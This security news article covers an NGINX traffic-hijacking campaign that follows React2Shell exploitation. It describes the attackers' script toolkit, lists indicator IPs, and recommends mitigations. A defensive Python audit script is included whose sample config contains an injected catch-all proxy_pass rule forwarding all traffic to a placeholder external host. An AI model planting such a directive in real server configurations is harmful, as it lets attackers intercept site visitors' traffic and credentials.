Researchers have uncovered a large-scale web traffic hijacking campaign that abuses malicious NGINX configurations to secretly intercept and redirect legitimate website traffic. The campaign mainly targets NGINX servers and popular server management tools like the Baota (BT) Panel, allowing attackers to route web traffic through infrastructure they control.
According to findings from Datadog Security Labs, the attack activity is linked to the exploitation of React2Shell (CVE-2025-55182), a critical vulnerability with a CVSS score of 10.0. This flaw enables attackers to gain remote access and then manipulate NGINX settings to hijack traffic without raising immediate alarms.
NGINX is widely used as a reverse proxy and load balancer, making it a high-value target for attackers. In this campaign, threat actors inject malicious “location” directives into NGINX configuration files. These directives intercept normal user requests and silently forward them to attacker-controlled backend servers using the proxy_pass instruction.
As a result, users believe they are communicating with a legitimate website, while their traffic is actually passing through malicious infrastructure. This technique allows attackers to monitor, modify, or exploit web sessions, making it extremely dangerous for both website owners and visitors.
Security researcher Ryan Simon explained that the attackers focus heavily on:
Asian top-level domains (TLDs) such as .in, .id, .pe, .bd, and .th
Chinese hosting environments, particularly those using the Baota (BT) Panel
Government and education domains, including .gov and .edu
This targeting suggests a strong interest in high-trust websites, which can be leveraged for surveillance, credential theft, or further attacks.
The attack is powered by a multi-stage shell script toolkit designed to discover targets, maintain persistence, and deploy malicious NGINX configurations. Each script has a specific role in ensuring the attack runs smoothly and avoids detection.
Key components of the toolkit include:
zx.sh
Acts as the main controller, executing additional scripts using standard tools like curl or wget. If these tools are blocked, it falls back to creating raw TCP connections to send HTTP requests manually.
bt.sh
Specifically targets the Baota (BT) Panel environment. It overwrites existing NGINX configuration files to inject malicious proxy rules.
4zdh.sh
Scans common NGINX configuration directories across systems. It carefully creates new configurations while minimizing syntax errors that could alert administrators.
zdh.sh
Focuses on Linux-based and containerized NGINX deployments, with special attention to domains using .in and .id TLDs.
ok.sh
Generates a detailed report of all active NGINX traffic hijacking rules, allowing attackers to track successful compromises.
Together, these scripts enable attackers to persistently control traffic flows, even after server restarts or minor configuration changes.
The disclosure also aligns with recent intelligence from GreyNoise, which reported that just two IP addresses — 193.142.147[.]209 and 87.121.84[.]24 — were responsible for 56% of all observed React2Shell exploitation attempts within two months of public disclosure.
Between January 26 and February 2, 2026, researchers observed 1,083 unique IP addresses actively attempting to exploit CVE-2025-55182. This highlights how quickly attackers weaponize newly disclosed vulnerabilities, especially those affecting widely used technologies like React and NGINX.
GreyNoise noted that the main attackers deploy different post-exploitation payloads, revealing varying objectives:
One threat actor downloads cryptomining malware from staging servers to exploit system resources.
Another actor opens reverse shells directly back to scanning IPs, indicating a desire for interactive control rather than automated exploitation.
This behavior suggests that the campaign is not only financially motivated but may also involve espionage or long-term access goals.
In a related development, researchers uncovered a coordinated reconnaissance campaign targeting Citrix ADC Gateway and Netscaler Gateway systems. Attackers used tens of thousands of residential proxy IPs combined with a single Microsoft Azure-hosted IP address (52.139.3[.]76).
According to GreyNoise, the campaign operated in two modes:
Massive distributed scanning using residential proxies to discover exposed login panels.
Concentrated cloud-based scanning focused on identifying software versions.
This dual strategy indicates highly organized reconnaissance, aimed at preparing future exploitation attempts.
This NGINX traffic hijacking campaign is particularly dangerous because it:
Exploits trusted infrastructure
Operates at the configuration level, not just application code
Can remain undetected for long periods
Affects government, education, and high-value domains
Once traffic is hijacked, attackers can steal credentials, inject malware, manipulate content, or spy on sensitive communications.
To reduce risk, organizations should:
Immediately patch systems vulnerable to CVE-2025-55182
Audit NGINX configuration files for unauthorized proxy_pass directives
Restrict access to Baota (BT) and other management panels
Monitor outbound traffic for unexpected backend connections
Use file integrity monitoring to detect configuration changes
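As an added example that is not part of the Datadog or GreyNoise findings, the following Python script implements the proxy_pass audit recommended above: it walks the location blocks in an NGINX configuration, extracts each proxy_pass target, and flags any upstream host that is not on a locally maintained allowlist. The allowlist and the sample configuration are constructed for the example, and 203.0.113.10 is a documentation-range placeholder, not an indicator from the campaign.

```python
import re
from pathlib import Path

# Upstream hosts this server is expected to proxy to. Constructed sample
# allowlist; a real deployment maintains its own from known-good configs.
ALLOWED_UPSTREAMS = {"127.0.0.1", "localhost", "app_backend"}

# One location block: "location [modifier] <path> { ... }" with no nested braces.
LOCATION_RE = re.compile(r"location\s+(?:[=~*^]+\s+)?(\S+)\s*\{([^{}]*)\}", re.S)
PROXY_PASS_RE = re.compile(r"proxy_pass\s+([^;\s]+)\s*;")
# Host part of a proxy_pass target: scheme://host[:port]/... or a bare upstream name.
HOST_RE = re.compile(r"^(?:https?://)?\[?([^\]/:]+)\]?")


def find_suspicious_proxies(config_text: str, allowed=ALLOWED_UPSTREAMS) -> list[tuple[str, str]]:
    """Return (location path, proxy_pass target) pairs whose upstream host
    is not on the allowlist, i.e. candidates for an injected hijack rule."""
    findings = []
    for loc in LOCATION_RE.finditer(config_text):
        path, body = loc.group(1), loc.group(2)
        for pp in PROXY_PASS_RE.finditer(body):
            target = pp.group(1)
            host_match = HOST_RE.match(target)
            host = host_match.group(1) if host_match else target
            if host not in allowed:
                findings.append((path, target))
    return findings


def scan_directory(root: str, allowed=ALLOWED_UPSTREAMS) -> dict[str, list[tuple[str, str]]]:
    """Scan every .conf file under root (e.g. /etc/nginx or the BT Panel vhost
    directory) and map file path -> suspicious (location, proxy_pass) pairs."""
    results = {}
    for conf in Path(root).rglob("*.conf"):
        hits = find_suspicious_proxies(conf.read_text(errors="replace"), allowed)
        if hits:
            results[str(conf)] = hits
    return results


# Constructed sample: a legitimate local upstream plus an injected catch-all
# location that forwards all traffic to an external host (placeholder address).
SAMPLE_CONF = """
server {
    listen 80;
    server_name example-site.invalid;
    location /api/ { proxy_pass http://127.0.0.1:8080; }
    location / {
        proxy_set_header Host $host;
        proxy_pass http://203.0.113.10:8443/;
    }
}
"""

if __name__ == "__main__":
    for path, target in find_suspicious_proxies(SAMPLE_CONF):
        print(f"suspicious: location {path} -> proxy_pass {target}")
```

Unix-socket targets (proxy_pass http://unix:/path.sock) are reported as host "unix"; add that token to the allowlist if your server uses them.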
The discovery of this malicious NGINX configuration campaign highlights how attackers are shifting toward infrastructure-level attacks that bypass traditional security controls. With critical vulnerabilities like React2Shell being actively exploited, organizations must act quickly to secure their web servers and continuously monitor for suspicious configuration changes.